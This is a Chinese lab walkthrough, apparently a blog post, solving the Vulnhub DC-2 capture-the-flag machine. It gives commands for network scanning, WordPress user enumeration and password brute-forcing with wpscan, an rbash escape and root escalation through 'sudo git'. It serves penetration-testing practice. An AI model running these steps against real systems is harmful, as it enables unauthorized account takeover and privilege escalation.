Vulnhub DC-2靶场

目录

搭建靶场

发现目标

信息收集

漏洞利用

Flag1

Flag2

Flag3

Flag4

Flag5

搭建靶场

靶场下载地址

DC: 2 ~ VulnHub

下载解压文件,并使用虚拟机软件 创建目标

发现目标

netdiscover -r 192.168.226.0/24

发现目标对象 为 :192.168.226.140

信息收集

nmap -sS -sV -A -T4 -p- 192.168.226.139

使用nmap查看目标 开启了那些端口与服务

 指纹信息收集 报错

 使用BurpSuite分析

发现强跳dc-2

 将dc-2 写入hosts

 直接访问dc-2

 网站cms收集

 网站目录扫描

漏洞利用

Flag1

网站首页 有flag 直接访问

Flag2

根据flag1提示使用cewl 生成 密码字典

cewl http://dc-2/ -w password.txt

 有了密码字典 那应该有登录框 此时想到在目录扫描过程中的后台登录

 有了密码字典 还需要用户字典,网站采用wordpress 可以通过wpscan进行用户探测

wpscan --url http://dc-2 --enumerate u

对站点进行穷举

wpscan --url http://dc-2/ -U user.txt -P password.txt

成功获取账号与密码

 登入后台找到flag

Flag3

根据提示 可以通过其他途径获取进入的通道 此时想起ssh登入端口为7744

 使用cat命令 受限

改用vi命令编辑 

Flag4

根据提示需要找到jerry目录

 绕过rbash限制

export -p
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

找到flag

Flag5

根据提示使用git提权

sudo git -p help config
!/bin/sh

在root目录下找到flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值